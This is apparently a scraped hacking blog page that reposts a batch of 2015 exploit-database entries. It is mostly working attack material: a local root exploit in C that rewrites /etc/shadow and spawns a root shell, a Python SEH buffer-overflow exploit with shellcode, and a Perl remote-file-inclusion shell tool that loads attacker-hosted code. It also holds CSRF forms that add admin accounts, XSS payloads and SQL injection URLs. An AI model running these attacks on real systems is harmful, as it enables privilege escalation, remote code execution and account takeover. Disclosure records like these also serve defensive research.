Advisory ID: HTB23282
Product: Zen Cart
Vendor: Zen Ventures, LLC
Vulnerable Version(s): 1.5.4
Tested Version: 1.5.4
Advisory Publication: November 25, 2015 [without technical details]
Vendor Notification: November 25, 2015
Vendor Patch: November 26, 2015
Public Disclosure: December 16, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8352
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered critical vulnerability in a popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise vulnerable system. A remote unauthenticated attacker might be able to execute arbitrary PHP code on the target system, run arbitrary system commands, gain complete access to application's database and obtain information of all website users.
The vulnerability exists due to absence of filtration of directory traversal sequences in "act" HTTP GET parameter in "/ajax.php" script, when including local PHP files using 'require()' PHP function. A remote unauthenticated attacker can include and execute arbitrary PHP code on the target system with privileges of the web server.
A simple exploit below will include file "/tmp/file.php" and execute its content:
http://[host]/ajax.php?method=1&act=/../../../../tmp/file
-----------------------------------------------------------------------------------------------
Solution:
Apply vendor's patch.
More Information:
https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23282 - https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File Inclusion
[2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of e-commerce; free, user-friendly, open source shopping cart software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119340
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/64779/info
Atmail Webmail Server is prone to an HTML-injection vulnerability.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Atmail 7.1.3 is vulnerable; others versions may also be affected.
<iframe width=0 height=0 src="javascript:alert('xss in main body')">
source: https://www.securityfocus.com/bid/64740/info
EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability.
An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Local File Disclosure:
=====================
www.example.com/utils.php?action=download&filename=file.php%00
CSRF [Add Admin]:
================
<form method=.POST. name=.form0. action=.
http://www.example.com/centraladmin.php?process=processuser.>
<input type=.hidden. name=.flag. value=.add./>
<input type=.hidden. name=.old_username. value=."/>
<input type=.hidden. name=.username. value=.admin./>
<input type=.hidden. name=.name. value=.mm./>
<input type=.hidden. name=.sirname. value=.hh./>
<input type=.hidden. name=.email. value=.email@live.com./>
<input type=.hidden. name=.password. value=.12121212./>
<input type=.hidden. name=.repeatedpassword. value=.12121212./>
<input type=.hidden. name=.select_all. value=.yes./>
<input type=.hidden. name=.access_to_page47. value=.2./>
<input type=.hidden. name=.save. value=.Save./>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?>
<input type=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/>
<input type=â?hiddenâ? name=â?passâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?addnewâ? value=â?1?/>
<input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/>
<input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/>
</form>
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Trying to win race, attempt 749
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
size_t attempts = 0;
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (pid == -1)
continue;
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
source: https://www.securityfocus.com/bid/64734/info
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
http://www.example.com/news.php?id=1
source: https://www.securityfocus.com/bid/64734/info
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
http://www.example.com/products.php?cat_id=4
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
a = socket.socket()
print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))
entire=4500
# Junk
buff = "A"*4061
# Next SEH
buff+= "\xeb\x0A\x90\x90"
# pop pop ret
buff+= "\x98\x97\x01\x10"
buff+= "\x90"*19
# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode
buff+= "\x90"*7
buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
# HEAD
a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")
a.close()
print "Done..."
Source: https://code.google.com/p/google-security-research/issues/detail?id=663
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==17016==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd11f12408 at pc 0x7ff4a833d06d bp 0x7ffd11f11590 sp 0x7ffd11f11588
WRITE of size 8 at 0x7ffd11f12408 thread T0
#0 0x7ff4a833d06c in dissect_tds7_colmetadata_token wireshark/epan/dissectors/packet-tds.c:2935:29
#1 0x7ff4a8328d41 in dissect_tds_resp wireshark/epan/dissectors/packet-tds.c:3729:32
#2 0x7ff4a8326608 in dissect_netlib_buffer wireshark/epan/dissectors/packet-tds.c:3911:17
#3 0x7ff4a8324de2 in dissect_tds_message wireshark/epan/dissectors/packet-tds.c:4090:13
#4 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
#6 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#7 0x7ff4a82e1f80 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
#8 0x7ff4a82e77f3 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#9 0x7ff4a82e2b4c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#10 0x7ff4a82f7f53 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#11 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#14 0x7ff4a743a59b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#15 0x7ff4a7444fc9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#16 0x7ff4a743ace9 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2508:5
#17 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7ff4a631fb54 in dissector_try_uint wireshark/epan/packet.c:1174:9
#21 0x7ff4a7c1d470 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:3977:10
#22 0x7ff4a7c1cc2c in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:4954:5
#23 0x7ff4a7c150a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:4995:5
#24 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
#26 0x7ff4a631efad in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0x7ff4a703c3a6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#28 0x7ff4a632ceb1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#29 0x7ff4a631f7da in call_dissector_work wireshark/epan/packet.c:691:9
#30 0x7ff4a63294ae in call_dissector_only wireshark/epan/packet.c:2662:8
#31 0x7ff4a631aebf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#32 0x7ff4a631a52b in dissect_record wireshark/epan/packet.c:501:3
#33 0x7ff4a62c85b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#34 0x5264eb in process_packet wireshark/tshark.c:3728:5
#35 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#36 0x515daf in main wireshark/tshark.c:2197:13
Address 0x7ffd11f12408 is located in stack of thread T0 at offset 2088 in frame
#0 0x7ff4a83285df in dissect_tds_resp wireshark/epan/dissectors/packet-tds.c:3658
This frame has 1 object(s):
[32, 2088) 'nl_data' <== Memory access at offset 2088 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-tds.c:2935:29 in dissect_tds7_colmetadata_token
Shadow bytes around the buggy address:
0x1000223da430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000223da480: 00[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x1000223da490: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da4c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000223da4d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==17016==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11846. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38993.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=650
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==9819==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000027b3c at pc 0x00000087416b bp 0x7fff95547770 sp 0x7fff95547768
WRITE of size 1 at 0x603000027b3c thread T0
#0 0x87416a in iseries_parse_packet wireshark/wiretap/iseries.c:820:27
#1 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
#2 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#3 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#4 0x52c1df in main wireshark/tshark.c:2197:13
0x603000027b3c is located 3 bytes to the right of 25-byte region [0x603000027b20,0x603000027b39)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6f1a34610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
#3 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#4 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#5 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/iseries.c:820:27 in iseries_parse_packet
Shadow bytes around the buggy address:
0x0c067fffcf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c067fffcf60: fa fa fa fa 00 00 00[01]fa fa 00 00 00 00 fa fa
0x0c067fffcf70: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fffcf80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fffcf90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x0c067fffcfa0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fffcfb0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==9819==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38992.zip
# Title: Ovidentia Module newsletter 2.2 (admin.php) Remote File Inclusion Exploit
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fnewsletter&file=newsletter-2-2.zip&idf=882
# Proof-of-Concept:
# /newsletter-2-2/programs/admin.php line 3
# ----------------------------------------------------------
# require_once($GLOBALS['babInstallPath'].'admin/acl.php');
# ----------------------------------------------------------
# Problem: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
# Fix: Declare this parameter or use an alert in php-sourcecode.
# Zum Beispiel "BummPrengeleng du Nasenmensch!" :D
# ----------------
# ~~Exploitcode~~
# ----------------
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'programs/admin.php?GLOBALS[babInstallPath]'.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[....]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[shell] \$";}}}last;
sub head()
{
print "\n============================================================================\r\n";
print " *Ovidentia Module newsletter 2.2 (admin.php) Remote File Inclusion Exploit*\r\n";
print "============================================================================\r\n";
}
sub usage()
{
head();
print " Usage: sploit.pl [someone] [cmd shell location] [cmd shell variable]\r\n\n";
print " <Site> - Full path to phgstats ex: http://www.someone.com/ \r\n";
print " <cmd shell> - Path to cmd Shell e.g http://www.someone/cmd.txt \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "============================================================================\r\n";
print " Bug Found by bd0rk \r\n";
print "============================================================================\r\n";
exit();
}
########################################################################################
#______________________________________________________________________________________
# Exploit Title : Article Script SQL Injection Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://articlesetup.com/
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Software Link : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Date : 15-December-2015
# Version : (Version 1.00)
# CVE : NONE
# Tested On : Linux - Chrome
# Category : Web Application
# MY HOME : http://linux-zone.org/Forums - research@linux-zone.org
#______________________________________________________________________________________
#######################################################################################
#
# localHost/article.php?id=SQL
#______________________________________________________________________________________
## Vulnerability Code
<?php
include('config.php');
//Create site settings variables
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
$siteinfo = mysql_fetch_array($siteresult);
$siteurl = $siteinfo['url'];
$article = $_GET['id'];
if (!is_numeric($article)) {
header('Location: '.$siteurl);
}
else
{
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
//Create site settings variables
$siteinfo = mysql_fetch_array($siteresult);
$sitetitle = $siteinfo['title'];
$siteurl = $siteinfo['url'];
$sitecomments = $siteinfo['comments'];
$commentmod = $siteinfo['commentmod'];
$query = "select * from articles where status=0 and id = ".$article;
$articleresults = mysql_query($query,$connection) or die(mysql_error());
$num_results = mysql_num_rows($articleresults);
$articleinfo = mysql_fetch_array($articleresults);
if (!$num_results) {
header('Location: '.$siteurl);
}
//Get article info
$id = $articleinfo['id'];
$authorid = $articleinfo['authorid'];
$date = strtotime($articleinfo['date']);
$artdate = date('m/d/y', $date);
$categoryid = $articleinfo['categoryid'];
$title = stripslashes($articleinfo['title']);
$body = stripslashes($articleinfo['body']);
$resource = $articleinfo['resource'];
//Meta Info
$cathead = 0;
$metatitle = $title." - ";
include('header.php');
include('sidebar.php');
if ($seourls == 1) { $scrubtitle = generate_seo_link($title); }
// Setup the article template
$articletemp = new Template("templates/".$template."/article.tpl");
// get author info
$authorquery = "select * from authors where id=".$authorid;
$authorresult = mysql_query($authorquery,$connection) or die(mysql_error());
$authorinfo = mysql_fetch_array($authorresult);
$authorname = $authorinfo['displayname'];
$authorbio = $authorinfo['bio'];
$gravatar = $authorinfo['gravatar'];
if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); }
// get category info
$catquery = "select * from categories where id=".$categoryid;
$catresult = mysql_query($catquery,$connection) or die(mysql_error());
$catinfo = mysql_fetch_array($catresult);
$categoryname = $catinfo['name'];
$catparent = $catinfo['parentid'];
if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); }
// if the category doesn't have a parent
if ($catparent == NULL) {
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
// if the category DOES have a parent
} else {
$query = "select * from categories where id=".$catparent;
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_array($result);
$parentname = $info['name'];
if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); }
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$catparent."/"
.$scrubparent."/\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent
."\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
}
// Add a view to this article
$query = "select * from articleviews where articleid = ".$article;
$results = mysql_query($query,$connection) or die(mysql_error());
$viewinfo = mysql_fetch_array($results);
if ($viewinfo == NULL) {
$sql = "INSERT INTO articleviews VALUES (".$article.", 1)";
$query = mysql_query($sql);
} else {
$totalviews = $viewinfo['views'];
$totalviews++;
$sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article."";
$query = mysql_query($sql);
}
if ($seourls == 1) { // With SEO URLS
$authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>";
} else {
$authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>";
}
// Setup all template variables for display
$articletemp->set("authorname", $authorname);
$articletemp->set("authorlink", $authorlink);
$articletemp->set("date", $artdate);
$articletemp->set("displaycat", $displaycat);
$articletemp->set("views", $totalviews);
$articletemp->set("title", $title);
$articletemp->set("body", $body);
$articletemp->set("gravatar", $gravatar);
$articletemp->set("resource", $resource);
// For the adcode
$query = "select * from adboxes where id=1;";
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_assoc($result);
$articletemp->set("250adcode", stripslashes($info['adcode']));
// Outputs the homepage template!
echo $articletemp->output();
//Displays the comments -- if admin has them enabled
if($sitecomments == 0) {
echo "<br/><h2>Comments</h2>";
require_once 'comments/classes/Comments.class.php';
/* Article ID which shows the comments */
$post_id = $article;
/* Level of hierarchy comments. Infinit if declared NULL */
$level = NULL;
/* Number of Supercomments (level 0) to display per page */
$supercomments_per_page = 10000;
/* Moderate comments? */
if ($commentmod == 0) {
$moderation = true;
} else {
$moderation = false;
}
# Setup db config array #
$db_config = array("db_name" => $db_name,
"db_user" => $dbusername,
"db_pass" => $dbpassword,
"db_host" => $server );
# Create Object of class comments
$comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config);
# Display comments #
echo $comments->getComments();
}
include('rightsidebar.php');
include('obinclude.php');
}
?>
#######################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
##########################################################
# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792
PoC1:
/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------
include $babInstallPath."admin/acl.php";
------------------------------------------------------
[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]
Description: The $babInstallPath-parameter isn't declared before include.
So an attacker can execute evil-code 'bout this.
PoC2:
/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
-------------------------------------------------------
[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
Description: The problem is the same as the first. -.-
It's possible to compromise the system.
### The 27 years old, german hacker bd0rk ###
Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
II. Backup Download
##############
VULNERABILITY
##############
/Backup/processbackup.php (LINE: 89-93)
-----------------------------------------------------------------------------
//save file
// $handle =
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
$handle = fopen('RecordManager.sql','w+');
fwrite($handle,$return);
fclose($handle);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
1. Open http://www.example.com/DSM/Backup/processbackup.php
2. When you open the link produces RecordManager.sql
3. to download backup [http://www.example.com/DSM/Backup/RecordManager.sql]
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
[Change Password & Email Admin]
<html>
